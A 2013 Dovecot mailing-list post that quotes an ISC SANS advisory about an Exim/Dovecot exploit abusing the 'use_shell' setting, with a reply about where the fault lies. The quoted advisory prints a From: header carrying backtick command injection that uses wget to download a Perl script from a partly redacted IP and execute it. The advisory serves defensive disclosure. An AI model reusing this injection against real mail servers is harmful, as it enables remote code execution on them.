[Dovecot] from ISC: Exim/Dovecot exploit making the rounds
Noel Butler
noel.butler at ausics.net
Sun Jun 9 12:50:06 EEST 2013
Actually, it is an exploit against dovecot LDA, introduced, and caused
by, exim.
On Sun, 2013-06-09 at 09:58 +0200, Luigi Rosa wrote:
> One of our readers wrote in to let us know that he had received an attempted
> Exim/Dovecot exploit attempt against his email server. The exploit partially
> looked like this:
>
> From:
> x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com
>
> (Obviously edited for your safety, and I didn't post the whole thing.)
>
> This is an exploit against Dovecot that is using the feature "use_shell" against
> itself. This feature, unfortunately, is found in the example wiki on Dovecot's
> website, and also in their example configuration. We'd caution anyone that is
> using Dovecot to take a look at their configuration and make use they aren't
> using the "use_shell" parameter. Or if you are, make darn sure you know what
> you are doing, and how to defend yourself.
>
>
> https://isc.sans.edu/diary/EximDovecot+exploit+making+the+rounds/15962
>
>
>
>
> Ciao,
> luigi
>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 490 bytes
Desc: This is a digitally signed message part
URL: <http://dovecot.org/pipermail/dovecot/attachments/20130609/fc3f0d3c/attachment.bin>
More information about the dovecot
mailing list